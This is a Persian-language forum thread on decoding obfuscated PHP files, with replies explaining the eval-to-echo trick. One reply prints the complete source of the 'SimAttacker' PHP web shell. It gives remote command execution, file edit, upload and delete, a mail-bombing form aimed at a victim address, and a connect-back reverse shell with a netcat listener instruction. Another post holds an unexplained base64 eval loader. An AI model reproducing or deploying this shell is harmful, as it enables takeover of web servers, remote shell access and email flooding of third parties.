صفحه 1 از 2 12 آخرآخر
نمایش نتایج 1 تا 40 از 53

نام تاپیک: دیکد پی اچ پی

  1. #1

    دیکد پی اچ پی

    سلام
    من دو تا فایل دارم میخواستم دیکد کنم ولی با دیکدر های انلاین نتونستم و چیزی هم از پی اچ پی سر در نمیارم خواهش میکنم اگه ممکنه واسم دیکد کنید یه دنیا ممنون میشم خیلی هم عجله دارم خیلی ممنون
    فایل های ضمیمه فایل های ضمیمه
    • نوع فایل: zip 1.zip‏ (32.3 کیلوبایت, 133 دیدار)

  2. #2

    نقل قول: دیکد پی اچ پی

    بفرمایید. فایل ضمیمه، حاوی نسخه دیکد شده فایلهای اصلی هست. موفق باشید.
    فایل های ضمیمه فایل های ضمیمه

  3. #3

    نقل قول: دیکد پی اچ پی

    سلام
    یه دنیا ممنونتم خیلی نوکرم
    میشه بگی چطوری دیکد کردین چون از این فایلا زیاد دارم

  4. #4

    نقل قول: دیکد پی اچ پی

    کار خاصی نکردم. شما ابتدا سورس کد فایل رو باز کنید و آخرین eval که توش دیدین رو با echo جایگزین کنید. حالا اسکریپت رو اجرا کنید و هر چیزی توی صفحه به نمایش در میاد (که یکسری دستورات PHP هست) رو کپی کنید و توی سورس کد، آخرین دستور eval (که به echo تغییر داده بودین) رو کلاً حذف کنید و متنی که کپی کردین رو به جاش Paste کنید. دوباره آخرین eval رو با echo جایگزین کنید و کد رو اجرا کنید. حالا کافیه توی مرورگر، View Source رو انتخاب کنید (Ctrl+U) تا سورس کد اصلی صفحه رو مشاهده کنید.
    موفق باشید.

  5. #5

    نقل قول: دیکد پی اچ پی

    ممنون
    بیشتر از اینا تشکر داری

  6. #6

    Arrow نقل قول: دیکد پی اچ پی

    با سلام
    ممکنه لطفا این فایل رو برام دیکد کنید. ممنون میشم.
    فایل های ضمیمه فایل های ضمیمه

  7. #7

    نقل قول: دیکد پی اچ پی

    کد HTML:
    ?><?php
    error_reporting(E_ERROR | E_WARNING | E_PARSE);
    
     //File Edit
     $fedit=$_GET['fedit'];
     if ($fedit <> "" ){
     $fedit=realpath($fedit);
     $lines = file($fedit);
     echo "<form action='' method='POST'>";
    echo "<textarea name='savefile' rows=30 cols=80>" ;
    foreach ($lines as $line_num => $line) {
     echo htmlspecialchars($line);
    }
    echo "</textarea>
        <input type='text' name='filepath'  size='60' value='$fedit'>
        <input type='submit' value='save'></form>";
        $savefile=$_POST['savefile'];
        $filepath=realpath($_POST['filepath']);
        if ($savefile <> "") 
        {
        $fp=fopen("$filepath","w+");
        fwrite ($fp,"") ;
        fwrite ($fp,$savefile) ;
        fclose($fp);
        echo "<script language='javascript'> close()</script>";
        }
    exit();
     }
    
    // CHmod - PRimission
    $fchmod=$_GET['fchmod'];
    if ($fchmod <> "" ){
    $fchmod=realpath($fchmod);
    echo "<center><br>
    chmod for :$fchmod<br>
    <form method='POST' action=''><br>
    Chmod :<br>
    <input type='text' name='chmod0' ><br>
    <input type='submit' value='change chmod'>
    </form>";
    $chmod0=$_POST['chmod0'];
    if ($chmod0 <> ""){
    chmod ($fchmod , $chmod0);
    }else {
    echo "primission Not Allow change Chmod";
    }
    exit();
    }
    ?><?php<html>
    
    <head>
    <meta http-equiv="Content-Language" content="en-us">
    <meta http-equiv="refresh" content="99999999999999" />
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
    <style>
    <!--
    body         { font-family: Tahoma; font-size: 8pt }
    -->
    </style>
    </head>
    
    <body>
        
    <div align="center">
        <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
            <tr>
                <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
                    <p align="center"><b>
                    <font face="Tahoma" size="2"><br>
                    </font>
                    <font color="#D2D200" face="Tahoma" size="2">
                    <span style="text-decoration: none">
                    <font color="#000000">
                    <a href="?id=fm&dir=C:\wamp\www    ">
                    <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
                    <p align="center"><b><a href="?id=cmd">
                    <span style="text-decoration: none">
                    <font face="Tahoma" size="2" color="#000000">
                    CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
                    <p align="center"><b><a href="?id=fake-mail">
                    <font face="Tahoma" size="2" color="#000000">
                    <span style="text-decoration: none">Fake mail</span></font></a></b></p>
                    <p align="center"><b>
                    <font face="Tahoma" size="2" color="#000000">
                    <a href="?id=cshell">
                    <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
                    <p align="center"><b>
                    <font color="#000000" face="Tahoma" size="2">
                    <a href="?id=">
                    <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
                    <p><p align="center"></td>
                <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
                ?><?php
                //*******************************************************
                //Start Programs About US
                $id=$_GET['id'];
    
                if ($id=="") {
                echo "
                <font face='Arial Black' color='#808080' size='1'>
    ***************************************************************************<br>
    &nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
    &nbsp;Programer : Hossein Asgary <br>
    &nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
    &nbsp;please : If you find bug or problems in program , tell me by : <br>
    &nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
    Enjoy :) [Only 4 Best Friends ] <br>
    ***************************************************************************</font></span></p>
    ";
    
    echo "<font color='#333333' size='2'>OS :". php_uname();
    echo "<br>IP :". 
    ($_SERVER['REMOTE_ADDR']);
    echo "</font>";
    
    
                }
                //************************************************************
                //cmd-command line
                $cmd=$_POST['cmd'];
                if($id=="cmd"){
            $result=shell_exec("$cmd");
            echo "<br><center><h3> CMD ExeCute </h3></center>" ;
            echo "<center>
            <textarea rows=20 cols=70 >$result</textarea><br>
            <form method='POST' action=''>
            <input type='hidden' name='id' value='cmd'>
            <input type='text' size='80' name='cmd' value='$cmd'>
            <input type='submit' value='cmd'><br>";
                
                
                
                }
                
            //********************************************************    
            
            //fake mail = Use victim server 4 DOS - fake mail 
            if ( $id=="fake-mail"){
            error_reporting(0);
            echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
            echo "<center><form method='post' action=''>
            Victim Mail :<br><input type='text' name='to' ><br>
            Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
            Comments:
            <br>
            <textarea rows='10' cols=50 name='Comments' ></textarea><br>
            <input type='submit' value='Send Mail Strm ' >
            </form></center>";
            //send Storm Mail
            $to=$_POST['to'];
            $nom=$_POST['nom'];
            $Comments=$_POST['Comments'];
            if ($to <> "" ){
            for ($i = 0; $i < $nom ; $i++){
            $from = rand (71,1020000000)."@"."Attacker.com";
            $subject= md5("$from");
            mail($to,$subject,$Comments,"From:$from");
            echo "$i is ok";
            }      
            echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
            }
            }
            //********************************************************
    
                //Connect Back -Firewall Bypass
                if ($id=="cshell"){
                echo "<br>Connect back Shell , bypass Firewalls<br>
                For user :<br>
                nc -l -p 1019 <br>
                <hr>
                <form method='POST' action=''><br>
                Your IP & BindPort:<br>
                <input type='text' name='mip' >
                <input type='text' name='bport' size='5' value='1019'><br>
                <input type='submit' value='Connect Back'>
                </form>";
             $mip=$_POST['mip'];
             $bport=$_POST['bport'];
             if ($mip <> "")
             {
             $fp=fsockopen($mip , $bport , $errno, $errstr);
             if (!$fp){
                   $result = "Error: could not open socket connection";
             }
             else {
             fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
          while(!feof($fp)){ 
           fputs ($fp," bash # ");
           $result= fgets ($fp, 4096);
          $message=`$result`;
           fputs ($fp,"--> ".$message."\n");
          }
          fclose ($fp);
             }
             }
                }
                
            //********************************************************
                //Spy File Manager
                $homedir=getcwd();
                $dir=realpath($_GET['dir'])."/";
                if ($id=="fm"){
                echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
                      &nbsp;<b>
                      <form action='' method='GET'>
                      &nbsp;Path:</b>
                      <input type='hidden' name='id' value='fm'>
                      <input type='text' name='dir' size='80' value='$dir'>
                      <input type='submit' value='dir'>
                      </form>
                     <br>";
    
                echo "
    
    <div align='center'>
    
    <table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
        <tr>
            <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
            <td height='28' width='82' align='center'>
            <font color='#000080' size='2'><b>Size KByte</b></font></td>
            <td height='28' width='83' align='center'>
            <font color='#008000' size='2'><b>Download</b></font></td>
            <td height='28' width='66' align='center'>
            <font color='#FF9933' size='2'><b>Edit</b></font></td>
            <td height='28' width='75' align='center'>
            <font color='#999999' size='2'><b>Chmod</b></font></td>
            <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
        </tr>";
                if (is_dir($dir)){
                if ($dh=opendir($dir)){
                while (($file = readdir($dh)) !== false) {
                $fsize=round(filesize($dir . $file)/1024);
            
                
        echo " 
        <tr>
            <th width='250' height='22' align='left' nowrap>";
            if (is_dir($dir.$file))
            {
            echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
            }
            else {
            echo "<font size='2' color='#666666'>&nbsp;$file ";
            }
            echo "</a></font></th>
            <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
            if (is_file($dir.$file))
            {
            echo "$fsize";
            }
            else {
            echo "&nbsp; ";
            }
            echo "
            </b></font></td>
            <td width='103' align='center' nowrap>";
            if (is_file($dir.$file)){
            if (is_readable($dir.$file)){
            echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
            }else {
            echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
             }
            }else {
            echo "&nbsp;";
             }
            echo "
            </a></font></td>
            <td width='77' align='center' nowrap>";
            if (is_file($dir.$file))
            {
            if (is_readable($dir.$file)){
            echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
            }else {
            echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
             }
            }else {
            echo "&nbsp;";
             }
            echo "
            </a></font></td>
            <td width='86' align='center' nowrap>";
            if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
            echo "<font size='1' color='#999999'>Dont in windows";
            }
            else {
            echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
            }
            echo "</a></font></td>
            <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
        </tr>
        ";
                  }
                  closedir($dh);
                } 
                }
                echo "</table>
    <form enctype='multipart/form-data' action='' method='POST'>
     <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
     Send this file: <input name='userfile' type='file' />
     <inpt type='hidden' name='Fupath'  value='$dir'>
     <input type='submit' value='Send File' />
    </form> 
                </div>";
                }
    //Upload Files 
    $rpath=$_GET['dir'];
    if ($rpath <> "") {
    $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
    print "<pre>";
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
    echo "<script language='javascript'> history.back(2)</script>";
    }
     }
     //file deleted
    $frpath=$_GET['fdelete'];
    if ($frpath <> "") {
    if (is_dir($frpath)){
    $matches = glob($frpath . '/*.*');
    if ( is_array ( $matches ) ) {
      foreach ( $matches as $filename) {
      unlink ($filename);
      rmdir("$frpath");
    echo "<script language='javascript'> alert('Success! Please refresh')</script>";
    echo "<script language='javascript'> history.back(1)</script>";
      }
      }
      }
      else{
    echo "<script language='javascript'> alert('Success! Please refresh')</script>";
    unlink ("$frpath");
    echo "<script language='javascript'> history.back(1)</script>";
    exit(0);
    
      }
      
    
    }
                ?><?php            
                </td>
            </tr>
            <tr>
                <td style="border: 1px dotted #FFCC66">
                <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
                Copyright 2004-Simorgh Security<br>
                Hossein-Asgari<br>
                </font><font color="#c0c0c0" size="1" face="Tahoma">
            </td>
            </tr>
        </table>
    </div>
    
    </body>
    
    </html>
    موفق باشید.

  8. #8

    نقل قول: دیکد پی اچ پی

    سلام میتونین این فایل رو برام دیکد کنید این فایل بوسیله سایت http://www.fopo.com.ar کد شده :
    چند تا فایل دارم فعلا این رو میفرستم اگه شد که بقیه اش رو هم میفرستم براتون:

    فایل رو از ضمیمه دانلود کنید
    فایل های ضمیمه فایل های ضمیمه
    • نوع فایل: rar 11.rar‏ (6.1 کیلوبایت, 21 دیدار)

  9. #9

    نقل قول: دیکد پی اچ پی

    با سلام خدمت دوستان
    بنده هم یک کد دارم کسی می تونه دیکد کنه
    <?php

    $o="QAAAOzh3b3cKDQ5uYS8nI3BiZQGFdG5zYicufAEgATImdH N1ADAvAbUAASslb3Nzdz0oKCUuJyEhJwH/tFQB8XQCAwRjDgO1JzonA9YpAVU8BpF6CmAADQAwApkjWFVCVl JCVFNcIHJ1E0BrIFoCcSN0BCABmHQBc25hJy8mbgoAdHRicwpW Lgeib2JmY2J1LyVLAGBoZGZzbmhpPScJwQmwcHBwKTQBDz80KW 51JS4FkGNuYi8AgQgxBNEGgACPOSczNidodScAsDsnNgTvBO8E 7w2Q+5IVTxVPFvAVTxc/dxVPGqIVT3NiDUAODgzgekFAJwhAI3NiancUQDoXKSN3bmJkYo ABFQFif3draGNiLyVbaSUrJwLVAAAuPCcoKCdhbmljbmlgJ2Zr AAxrJ3RyZWpuc3NiYycEwAVxdG4RCH1iOgBRaGEvBPQuPA4OA3 BmdXUQAGZ+JwGxJ3NoJ3J0YiduaSdzCAhvYidhFSBraGh3J2Zz AQJiaWMAASdoYSd3dWhgdWZqCg0oKBxQQAxzByB0Jyonb2h0cy dmAiAEEHUnAAJmYGJpcwoNI2BoaGBrYgHBOgAAIHNoaGtlZnV2 cmJ1bmJ0KYMAAbMpZGhqIBAQAqRyZjogSmh9bgAga2tmKDIpNy cvUA1AaHB0PCcIAFI8J1AAwydJUycyKTY8J2JpAAAqUlQ8J3Vx PTYpPyk3KTEuAAAnQGJkbGgoNTc3MTcwNT8nABhBbnViYWh/KDYpMgZRCzFkaGkQwHFidQqwJ3RzdQvAD0FmJzQ1KmUgAm5zD5 BzYmBidQoNYXJpZChBJwAzVHN1U2hJcmovIwCgFxBEbwYgAIAB QEpmYG5kLic3gCcAECNOaXM0NSAAUmkEMDonMzU+Mz4xMDU+MT xAICcZcTVZNDUKDQoNAoAnI2tiaR/EYHNvMZAH4ADABXIs0QHRFwEvI24B0Dc8WaAnAIA7AvUA4SwsB uYCwSMIkictOicjjCIIsjwnDgYjAdEoKE5hGyJha2gbwG4DA3Q nZWJ+aBnAHWFlaHJpY2YYMRzRIIBuaQ8iJy9ydHIjgH4nLCgqJ zUDHyk2MmIsPgiQC8A2LispgAVxAEEjAAWiA/B1YnRya3MEIRUUFLQFBQdABnBiYW5pJOBiYwmZJycZIGJ1F2E9 6E0wKWlicygQBGpmaQhgKGJpKGtmaWByJGApcze+fnci0AV0KQ KQBOc/0hCDORCAGEYSmgtREtQ6JFUnLwCkKicbKC0nLwXwLgHWKAHYLh nFTQQnABQoKAdgFHFkIJEna2J0dBEAZmk9QCcqErEJxwLxBtQ6 BaY7AmA2MzAzPzQCijEzPy4nOAGWLAc5Jz0nA6M8BPd6xQ4Atw HDJyw6TxBjJAJ8I256QCACMwKkdQcBYnNydWkElwFwL+FgYmli ZnVmYzACqGYnb2Z0bz5CZkJDYS9FTwGQUlVL94AFwh1wFPYHoz YhcDDAMWcCMCsnN382MjdNYDIAgTU2E0UDAzUDD2ACgAAwfzY3 NzRxfEEC4QuzAwM2Jzkc4DUtFgFlFHAb9AIhJzPIEW0AB2A0QQ AQRDcnLid7FOU2JyEBkrlpBZEnABAEHwQcRDcED38FkAQfLwgv fzQD8PxcBA8EAQ2wOVAAMAhQJyNTE5EvABAJBQpiRDcMqC4nOz sM4QwNRC4BoTUNqTUNokE3QV9+Jwm2UxXxBVAJlgVhETBBCWEE EQW/CyIF0hJwRt6tE5gF9jcAEAYyC8Qk1C8MQXsMoDUH8SUvJzFCH+ R0cmolYjJRJjJOoCIwVUg7MiZRLyMAYWlySINqJjxFfioQOic3 MBQjQWtmYCRgAQHyAyKkA4EoUAFQdHdcYHNhLyAiciBZgAGR/88FEgPFVlBXGwIhA7AMMQ30V4dZ9SonZfBYMSigWMCM/gChKiouXuUc8lViB9AMAgTQOCEHFAHRQjAvmJ0e4Do6KTALwiI nNRcQfCcAGgyzATUjBRD6hT1AAHBjYAFQAe86SoMvAjAnKCc2I 5AsBgC78QNwIgDRB/gZoCcAFCbDFQIF1AWHFXMsLDwQdOcfA3AB0wNYIjoFwAW0DWE3 JyYNYAIXEUsdkgbS//8DcYFQApcERAlxBIER7i5wdMQCMQBBAnkFlxSkCpMCce/vAEUGt1GxPgcIAiENwABxAEUC2EbRNgLoAqQAcAZDhcwvxCAwI CkDZykflQOQAqIoKAKEL2F3Zo4DhEBmaWwxBzCBMBhgYnNkby8 jmaAUAPfgcRBasg5CKdEvAFFYAgIRXZAGLwYmYW5gcnVMBmIFu 3d1BbWfgGBraGVmayeV9JiRK5HIAMRyZgvQDiNkiNEJGAFSYXc t0GF0aIYAlNB3YmkvAyQD4ic/NysnI2J1dTDHaWgAgz3wKyc0NzUCG0EjYXcNYAewFtAIACNocn MEoCVAQlMnKHNldThkIQBrbqGQOmlmcQCjKmZyc2ghZG9CEDoI gCFhYmYQoGJ0OlUT0CF2Om4II2lhaD0SYSdPU1NXnFA2W3WvcA ohgAIFwCgoYmRvaCclO3d1YjkGkTtwAigAoQIRl2BjYmVyYCdo aWt+CKgpgOa34FJ0YnUqRmAIYHZwqENyZgWJBLEnh4ECoU9odH MCRg/BAm8FAERoaWliZKLBAbE9J0RraHRiAmEAQSUKgQfTYXB1w3B+I C8RoBMwETASwgwwAeMoKCMdBjondHJlBRR0c3UvYRkwdAMjNjU/mDAzIJAoKPgnDX0QVAQWwIECTXBvbmti10BhYr+xGeAZ8wH8Dg 4jY2ZzZhnwBswLgcGRFfICQgEjI3d0U2jIIQngAJAvAZIrJyUa wVjZgg4O0uECY4AcQlBhZmt0Yi58eidiAIA9wAHwDiMOOHd1On QOEwQEAvIsJz4RMgIwAiFzdW6QArcAd3UBSXRzdVh1YndrZmTP xCA/eCArAsACNTfkASAKwzMwDhYQAHQSYAhAJ3wnvAUNMiUr4QUAU9 Asci47ZXUnKDkjknojvx/wJ2FkHXEYwQbiBUAAMJTVlMI/UdEwd29uZPgANsAc1TloATU5kisjcG5jc286MzcrAAEjamJzb2 hjOiB0c35rYiAZk6EENFEmLLBgWGpmQoEgKFkvb/xRWygAAlsoLjgvXFlbKFosLihubwFyMmd1a2WiMnE6IAJyKChK sAGAPCcKgBcyJMD7dUFVEfEncBMKAnAK3NB7YmvfAXERu6Bje3 AnC7WuhL6xar8wdyTABdAEQA4CcS8jbTpyICNtNjM7I+QhyqBt yqAB4XwODgBw4EB3dSZABHUhqC8j7LNcI21aFPEO0ScbcCcjIC U3JXADJxAyAQCNcSVuamZgYnQoI3Q9oAFAD2QpYG5hNWELACVB A7o2A78DvwoNA78nJWRkNQO/A78KDQO/JyU0A78DvwoNA78nJWRkMwO/A78KDQO/JyUyA78DvwoNA78nJWRkMQO/A78KDQO/JyUwA78DvwoNA78nJWRkPwO/A78KDQO/JyU+A78DvwoNA78nJXeQNiT/JP8xAHok0Z3BJjAneXd1Jxgjc2RY9tIsgQCBqMEAgWUtgKlBIy qCANBOKwFEdWxwYgFAQXVoakBOQS7wdbLiI3Nif3NYDg9kaGto BGECkwDRRmtraGTZAP+AA9FiAPgFBpEAc9JwBnIygU9iZmNidS 8lZvBza8Al+Cpz8XA9JweSKAaAWBIFYqjgO3EFBjIrJ6H8ADA1 BSBkaGNiAHAIlwWBA0IEEAMGVYAnMEnAMgG2Q2JSoGh+AfQBcR awODk=";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZT Y0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpS ZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbG xsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxs PTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3 hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDsk bGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbG xsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JH eHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbG xsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxs bGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbG xsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxs bGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbG xsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxs bGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbG xsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9 KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3 IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxb JGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbG xsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxs bGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbG xsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRs bGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JG xsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxs bGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPS RsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7 JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2 JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtl dmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SX VKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxs bGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbG xsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytd XjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3 hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hz YkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw =="));return;?>
    آخرین ویرایش به وسیله soltanshop : چهارشنبه 08 آذر 1391 در 06:35 صبح

  10. #10
    کاربر دائمی
    تاریخ عضویت
    آبان 1390
    محل زندگی
    http://reza.biz
    پست
    858

    نقل قول: دیکد پی اچ پی

    به جای eval
    echo بذارید و محتوای تولید شده رو در فایل قرار بدید اولش یه <?php هم بذارید

  11. #11

    نقل قول: دیکد پی اچ پی

    روش ديکد اقاي شهرکي گفت ,هي کد نذاريد بگيد ديکد کن خودتون ي امتحاني بکنيد
    آخرین ویرایش به وسیله imanitc : چهارشنبه 02 مرداد 1392 در 12:04 عصر

  12. #12
    کاربر دائمی آواتار elimiz
    تاریخ عضویت
    اردیبهشت 1390
    محل زندگی
    کرج
    پست
    283

    نقل قول: دیکد پی اچ پی

    سلام
    میتونید این فایل ر دیکید کنید خیلی ممنون میشم
    دستتو.ن درد نکنه

    دانلود کنید

  13. #13

    نقل قول: دیکد پی اچ پی

    نقل قول نوشته شده توسط elimiz مشاهده تاپیک
    سلام
    میتونید این فایل ر دیکید کنید خیلی ممنون میشم
    دستتو.ن درد نکنه

    دانلود کنید

    <?php

    function itunes_field_box( )
    {
    add_meta_box( "itunes-field-meta-box", "لینک آی‌تونز", "itunes_field", "post", "normal", "high" );
    }

    function itunes_field( $post )
    {
    $$GLOBALS['fywdoxssdos'] = get_post_custom( $post->ID );
    wp_nonce_field( "itunes_field_nonce", "meta_box_nonce" );
    include_once( "meta-box.php" );
    }

    function itunes_field_save( $post_ID )
    {
    if ( isset( $_POST['itunes-url'] ) )
    {
    $erenscxtv = "app_ID";
    $GLOBALS['uyeclap'] = "app_ID";
    $GLOBALS['wxmzocyjcfql'] = "url";
    $$GLOBALS['wxmzocyjcfql'] = parse_url( $_POST['itunes-url'] );
    ereg( "[^\\id].[0-9]+", $$GLOBALS['uoodpxy']['path'], $$erenscxtv );
    $$GLOBALS['fjozszodwoh'] = file_get_contents( "http://itunes.apple.com/lookup?id=".$$GLOBALS['uyeclap'][0]."" );
    $$GLOBALS['modxwy'] = json_decode( $$GLOBALS['fjozszodwoh'], TRUE );
    if ( $$GLOBALS['modxwy']['resultCount'] )
    {
    $GLOBALS['tkuoqogx'] = "result";
    $jtrnbfbmhjs = "result";
    $GLOBALS['xweeudkifhby'] = "result";
    $GLOBALS['hquakh'] = "post_ID";
    $gixbfldy = "result";
    $GLOBALS['ojfjuhtwf'] = "post_ID";
    $GLOBALS['mupgrnvnjc'] = "result";
    $GLOBALS['utdgseorlrak'] = "result";
    $egbltsxace = "post_ID";
    $rlknrpcy = "result";
    $ibuhcuwj = "result";
    $GLOBALS['wbilhoub'] = "post_ID";
    $iujuksb = "post_ID";
    $GLOBALS['velekiov'] = "post_ID";
    $oqeewvcmer = "result";
    $GLOBALS['kszemhan'] = "result";
    if ( $$GLOBALS['modxwy']['results'][0]['kind'] )
    {
    update_post_meta( $$egbltsxace, "itunes-kind", $$GLOBALS['modxwy']['results'][0]['kind'] );
    }
    if ( $$GLOBALS['utdgseorlrak']['results'][0]['screenshotUrls'] )
    {
    $qyohjajqhbj = "scr";
    $GLOBALS['idzslmahs'] = "scr";
    $GLOBALS['kohhyo'] = "scr";
    $GLOBALS['ssqnixnebw'] = "scr";
    $sedklgdcjg = "result";
    $$qyohjajqhbj = $$sedklgdcjg['results'][0]['screenshotUrls'];
    $GLOBALS['bgrqrrblvjj'] = "post_ID";
    $$GLOBALS['idzslmahs'] = implode( "|", $$GLOBALS['kohhyo'] );
    update_post_meta( $$GLOBALS['bgrqrrblvjj'], "itunes-screenshot", $$GLOBALS['ssqnixnebw'] );
    }
    if ( $$GLOBALS['xweeudkifhby']['results'][0]['ipadScreenshotUrls'] )
    {
    $GLOBALS['ykcqlsd'] = "post_ID";
    $GLOBALS['mlkxjnwkots'] = "result";
    $$GLOBALS['oovymkcscq'] = $$GLOBALS['mlkxjnwkots']['results'][0]['ipadScreenshotUrls'];
    $$GLOBALS['oovymkcscq'] = implode( "|", $$GLOBALS['oovymkcscq'] );
    update_post_meta( $$GLOBALS['ykcqlsd'], "photolink", $$GLOBALS['oovymkcscq'] );
    }
    if ( $$GLOBALS['modxwy']['results'][0]['artworkUrl60'] )
    {
    update_post_meta( $$GLOBALS['ryctutdv'], "itunes-thumbnail-160", $$GLOBALS['modxwy']['results'][0]['artworkUrl60'] );
    }
    $tcicecohvcm = "result";
    $GLOBALS['bgjxzcb'] = "post_ID";
    $GLOBALS['ruljurzudddt'] = "result";
    $cyzvrqffx = "result";
    $GLOBALS['turczdbbeod'] = "post_ID";
    if ( $$rlknrpcy['results'][0]['artworkUrl512'] )
    {
    update_post_meta( $$GLOBALS['ryctutdv'], "itunes-thumbnail-512", $$tcicecohvcm['results'][0]['artworkUrl512'] );
    }
    if ( $$ibuhcuwj['results'][0]['artistName'] )
    {
    update_post_meta( $$iujuksb, "itunes-name", $$cyzvrqffx['results'][0]['artistName'] );
    }
    $apdthxyokqik = "result";
    if ( $$GLOBALS['kszemhan']['results'][0]['price'] )
    {
    update_post_meta( $$GLOBALS['turczdbbeod'], "price", $$GLOBALS['modxwy']['results'][0]['price'] );
    }
    if ( $$GLOBALS['mupgrnvnjc']['results'][0]['version'] )
    {
    update_post_meta( $$GLOBALS['bgjxzcb'], "version", $$apdthxyokqik['results'][0]['version'] );
    }
    $bfhwjloruv = "result";
    $GLOBALS['lphaopkswlf'] = "post_ID";
    if ( $$GLOBALS['modxwy']['results'][0]['description'] )
    {
    update_post_meta( $$GLOBALS['ojfjuhtwf'], "itunes-description", $$GLOBALS['modxwy']['results'][0]['description'] );
    }
    if ( $$GLOBALS['tkuoqogx']['results'][0]['releaseDate'] )
    {
    update_post_meta( $$GLOBALS['wbilhoub'], "itunes-release-date", $$GLOBALS['modxwy']['results'][0]['releaseDate'] );
    }
    if ( $$bfhwjloruv['results'][0]['sellerName'] )
    {
    update_post_meta( $$GLOBALS['lphaopkswlf'], "product", $$jtrnbfbmhjs['results'][0]['sellerName'] );
    }
    if ( $$GLOBALS['modxwy']['results'][0]['currency'] )
    {
    update_post_meta( $$GLOBALS['velekiov'], "itunes-currency", $$GLOBALS['modxwy']['results'][0]['currency'] );
    }
